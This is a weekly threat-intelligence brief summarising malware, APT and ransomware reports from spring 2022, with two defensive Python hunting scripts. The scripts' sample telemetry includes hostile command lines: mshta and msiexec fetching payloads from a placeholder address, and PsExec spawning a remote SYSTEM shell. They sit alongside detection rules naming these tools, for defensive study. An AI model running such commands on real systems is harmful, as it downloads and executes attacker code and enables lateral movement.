Cyber Intel Brief: April 28- May 4, 2022

Malware

Bumblebee: New Malware Loader Under Active Development

Key Points:

  • Proofpoint observed phishing campaigns delivering a new downloader called Bumblebee, which has anti-analysis features and has been observed dropping Cobalt Strike, shellcode, Sliver, and Meterpreter.
  • Threat actors have been observed delivering Bumblebee via links and attachments in mass phishing and email thread hijacking campaigns, as well as via emails generated by submitting “Contact Us” forms on targets’ websites.
  • Observation of this activity may be possible by monitoring for WMI command usage and DLL file activity in the %AppData% directory.

Deepwatch Assessment:

Mitigation recommendations include incorporating the tactics, techniques, and procedures detailed by Proofpoint in your phishing awareness and simulation exercises, and ensuring that security protection systems such as anti-virus or endpoint detection and response (EDR) are up to date and functioning properly.


Malware

A New BluStealer Loader Uses Direct Syscalls to Evade EDRs

Key Points:

  • Minerva discovered a new version of a loader that uses direct syscalls to bypass EDR solutions. Once executed, it drops three files in the user’s %Temp% folder that ultimately load and execute the BluStealer malware.
  • Persistence is achieved by creating registry keys that execute the malware each time the user logs on. BluStealer is capable of harvesting credentials from numerous browsers and exfiltrating several file types from the user’s workstation.
  • Observation of this activity may be possible by monitoring for the files and folders detailed in the report, as well as for the creation of the registry keys.

Deepwatch Assessment:

Recommendations include incorporating the technique of file masquerading through the use of icons in your phishing awareness and simulation exercises, and ensuring that security protection systems such as anti-virus or endpoint detection and response (EDR) are up to date and functioning properly.


Threat Actors

The Lotus Panda is Awake, Again. Analysis of its Last Strike

Key Points:

  • Cluster25, a cyber threat intelligence company, recently analyzed an incident involving the APT group known as Naikon (Lotus Panda), which is known for targeting Southeast Asian countries to conduct long-term espionage operations.
  • Cluster25’s analysis revealed the initial access (spear phishing) vector and two open-source tools (Viper and ARL) the threat actors used during the incident.
  • Observation of this activity may be possible by monitoring for NI/EXE file activity in the %Temp% directory and suspended tasks involving svchost.exe.

Deepwatch Assessment:

Mitigation recommendations include incorporating the tactics, techniques, and procedures detailed by Cluster25 in your phishing awareness and simulation exercises, and ensuring that security protection systems such as anti-virus or endpoint detection and response (EDR) are up to date and functioning properly.


Threat Actors

UNC3524: Eye Spy on Your Email

Key Points:

  • Mandiant has discovered a threat actor they are tracking as UNC3524 that, at this time, they are unable to link to any known threat group. The group primarily targets the mailboxes of executive teams and of employees who work in corporate development, mergers and acquisitions, or IT security.
  • Initial access is unknown at this time. UNC3524 used an IoT botnet for C2 communications and deployed a new backdoor, dubbed QUIETEXIT, an SSH client-server application based on the open-source Dropbear SSH.
  • Observation of this activity may be possible by monitoring for outbound SSH traffic over ports other than 22 and/or to unknown IP addresses, and for an abnormal volume of network traffic originating from management interfaces.

Deepwatch Assessment:

Recommendations include identifying all devices on the network that do not support monitoring tools, following the vendor’s recommended hardening guidelines for them, and implementing network access controls to restrict or block outbound traffic from these devices.
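The three network observations above (SSH on a port other than 22, SSH to a destination that is not a known admin host, and unusual outbound volume from a management segment) can be expressed as a small hunt over connection logs. The script below is an added example, not code from Mandiant or from the brief; it reads constructed Zeek conn.log-style records, and the internal ranges, management VLAN, allowlisted destination and byte threshold are assumptions standing in for an organization’s own baseline.

```python
"""Flag outbound SSH that does not fit a management-traffic baseline.

Rules mirror the observation hints in the UNC3524 summary:
  ssh_nonstandard_port    -> SSH seen on a destination port other than 22
  ssh_unknown_destination -> SSH to an address not on the approved list
  mgmt_egress_volume      -> a management-VLAN host sent more bytes outbound
                             than the baseline threshold allows
"""
import ipaddress
from collections import defaultdict

# Constructed environment facts (assumptions for this example, not from the brief).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")   # appliance / OOB management VLAN
KNOWN_SSH_DESTS = {"198.51.100.5"}                 # approved vendor support host
MGMT_EGRESS_BYTES_THRESHOLD = 5_000_000            # per source, per log window

# Constructed conn.log-style records: ts, orig_h, resp_h, resp_p, service, orig_bytes.
SAMPLE_CONN_LOG = """\
1651200000.1\t10.10.0.7\t203.0.113.44\t8443\tssh\t120000
1651200001.2\t10.10.0.7\t203.0.113.44\t8443\tssh\t6000000
1651200002.3\t10.0.5.21\t198.51.100.5\t22\tssh\t45000
1651200003.4\t10.0.5.21\t10.0.9.3\t2222\tssh\t3000
1651200004.5\t192.168.3.9\t203.0.113.90\t22\tssh\t70000
1651200005.6\t10.0.5.22\t203.0.113.44\t443\tssl\t90000
"""


def parse_conn_log(text):
    """Parse tab-separated records into dicts; blank and comment lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, orig_h, resp_h, resp_p, service, orig_bytes = line.split("\t")
        rows.append({"ts": float(ts), "orig_h": orig_h, "resp_h": resp_h,
                     "resp_p": int(resp_p), "service": service,
                     "orig_bytes": int(orig_bytes)})
    return rows


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_ssh(rows):
    """Return (rule, source, destination, detail) tuples for every suspicious record."""
    alerts = []
    egress = defaultdict(int)
    for r in rows:
        if is_internal(r["resp_h"]):   # east-west traffic is out of scope here
            continue
        if ipaddress.ip_address(r["orig_h"]) in MGMT_NET:
            egress[r["orig_h"]] += r["orig_bytes"]   # count all protocols, not just SSH
        if r["service"] != "ssh":
            continue
        if r["resp_p"] != 22:
            alerts.append(("ssh_nonstandard_port", r["orig_h"], r["resp_h"], r["resp_p"]))
        if r["resp_h"] not in KNOWN_SSH_DESTS:
            alerts.append(("ssh_unknown_destination", r["orig_h"], r["resp_h"], r["resp_p"]))
    for src, total in egress.items():
        if total > MGMT_EGRESS_BYTES_THRESHOLD:
            alerts.append(("mgmt_egress_volume", src, "*", total))
    return alerts


if __name__ == "__main__":
    for rule, src, dst, detail in flag_ssh(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"{rule:24} {src:14} -> {dst:14} {detail}")
```

The volume rule deliberately counts every protocol from the management VLAN, not only SSH, because a backdoor that tunnels over a non-standard port may not be classified as SSH by the sensor at all; the SSH-specific rules then add precision where the service is recognized.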


Ransomware

REvil Ransomware Returns: New Malware Sample Confirms Gang is Back

Key Points:

  • Bleeping Computer reports that multiple security researchers have discovered a new ransomware sample believed to be compiled from the original REvil source code, indicating that the ransomware operation has reemerged.
  • The new sample does not encrypt devices, for a reason that is unknown at this time, and the group’s victim negotiation site uses the name “Sodinokibi.”
  • Observation of this activity may be possible by monitoring for anomalous attempts to enable RDP or log in over it, and for Tor browser downloads and Tor traffic activity.

Deepwatch Assessment:

To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.


Ransomware

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

Key Points:

  • Trend Micro analyzed a sample of the AvosLocker ransomware that employs a legitimate driver (Avast anti-rootkit) to disable security tools and is able to scan for endpoints vulnerable to the Log4j vulnerability using Nmap scripts.
  • Initial access was determined to be a vulnerability in Zoho ManageEngine ADSelfService Plus (possibly CVE-2021-40539). Additionally, the threat actors scanned for hosts vulnerable to Log4Shell, then used AnyDesk to transfer tools and the software deployment tool PDQ to deploy scripts to multiple endpoints.
  • Observation of this activity may be possible by monitoring for mshta.exe being used to execute remotely hosted HTML applications and for .aspx files being downloaded from remote IP addresses.

Deepwatch Assessment:

To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.


Ransomware

Conti and Hive Ransomware Operations: What We Learned From These Groups’ Victim Chats

Key Points:

  • Cisco Talos recently analyzed Conti and Hive chat logs with victim organizations; the report offers “insights into how Conti and Hive choose their targets, negotiate with victims, operate internally, and much more.”
  • Talos’ findings cover Conti and Hive communication methods, persuasion techniques, ransom negotiations, operational and targeting data, and more.
  • Observation of this activity may be possible by monitoring for anomalous WMI/Nltest/AdFind command usage and unauthorized or anomalous usage of PsExec or msiexec.

Deepwatch Assessment:

To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.
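Several of the endpoint observation hints in this brief share one shape: a process, file or registry event that matches a simple pattern. The script below is an added example, not code from Deepwatch, Proofpoint, Minerva, Trend Micro or Talos; it applies one rule per hint to constructed Sysmon-style events (field names Image, CommandLine, TargetFilename and TargetObject follow Sysmon conventions; hosts, paths and addresses are made up). It covers the Bumblebee hint (WMI usage, DLL activity under %AppData%), the BluStealer hint (Run-key persistence), the AvosLocker hint (mshta.exe launching a remote HTA) and the Conti/Hive hint (WMI/Nltest/AdFind reconnaissance and PsExec/msiexec usage).

```python
"""Hunt rules over Sysmon-style endpoint telemetry.

Rule -> observation hint in the brief:
  recon_command    -> Bumblebee, Conti/Hive: wmic / nltest / AdFind usage
  dll_in_appdata   -> Bumblebee: a DLL written under %AppData%
  run_key_persist  -> BluStealer: value set under a CurrentVersion\\Run key
  remote_hta       -> AvosLocker: mshta.exe given an http(s) URL
  remote_exec_tool -> Conti/Hive: PsExec, or msiexec installing from a URL
EventID 1 = process create, 11 = file create, 13 = registry value set.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events for this example; not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Host": "WS01", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic computersystem get domain"},
    {"EventID": "11", "Host": "WS01", "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\payload.dll"},
    {"EventID": "11", "Host": "WS01", "Image": r"C:\Program Files\App\setup.exe",
     "TargetFilename": r"C:\Program Files\App\helper.dll"},
    {"EventID": "13", "Host": "WS02", "Image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svc"},
    {"EventID": "1", "Host": "WS03", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/a.hta"},
    {"EventID": "1", "Host": "WS03", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\ui.hta"},
    {"EventID": "1", "Host": "DC01", "Image": r"C:\Windows\System32\nltest.exe",
     "CommandLine": "nltest /dclist:corp"},
    {"EventID": "1", "Host": "WS04", "Image": r"C:\Tools\PsExec.exe",
     "CommandLine": r"psexec \\WS05 -s cmd.exe"},
    {"EventID": "1", "Host": "WS04", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://203.0.113.10/x.msi"},
    {"EventID": "1", "Host": "WS06", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\carol\Downloads\app.msi"},
]

RECON_BINARIES = {"wmic.exe", "nltest.exe", "adfind.exe"}
REMOTE_EXEC_BINARIES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _process_rules(ev: Dict[str, str]) -> List[str]:
    hits = []
    image, cmd = _basename(ev.get("Image", "")), ev.get("CommandLine", "")
    if image in RECON_BINARIES:
        hits.append("recon_command")
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("remote_hta")            # local .hta files are left alone
    if image in REMOTE_EXEC_BINARIES or (image == "msiexec.exe" and URL_RE.search(cmd)):
        hits.append("remote_exec_tool")      # local MSI installs are left alone
    return hits


def _file_rules(ev: Dict[str, str]) -> List[str]:
    target = ev.get("TargetFilename", "").lower()
    return ["dll_in_appdata"] if target.endswith(".dll") and "\\appdata\\" in target else []


def _registry_rules(ev: Dict[str, str]) -> List[str]:
    return ["run_key_persist"] if RUN_KEY_RE.search(ev.get("TargetObject", "").lower()) else []


def hunt(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (rule, host, evidence) for every event that matches a rule."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == "1":
            rules, evidence = _process_rules(ev), ev.get("CommandLine", "")
        elif eid == "11":
            rules, evidence = _file_rules(ev), ev.get("TargetFilename", "")
        elif eid == "13":
            rules, evidence = _registry_rules(ev), ev.get("TargetObject", "")
        else:
            continue
        findings.extend((rule, ev["Host"], evidence) for rule in rules)
    return findings


def summarize(findings: List[Tuple[str, str, str]]) -> Dict[str, int]:
    """Hits per rule, so an analyst sees which technique fired and how often."""
    counts: Dict[str, int] = {}
    for rule, _, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, host, evidence in hunt(SAMPLE_EVENTS):
        print(f"{rule:17} {host:5} {evidence}")
```

Each rule is intentionally narrow (a remote URL for mshta.exe and msiexec, the AppData path for DLL writes, the Run/RunOnce key for registry sets) so that ordinary administrative use of the same binaries does not fire; tuning it to an environment means adding the legitimate sources to an allowlist rather than widening the pattern.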


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like “might” and “may” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information or because the available information is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or remote event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our judgments are based on reliable information and/or that the nature of the problem allows us to make a sound judgment. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
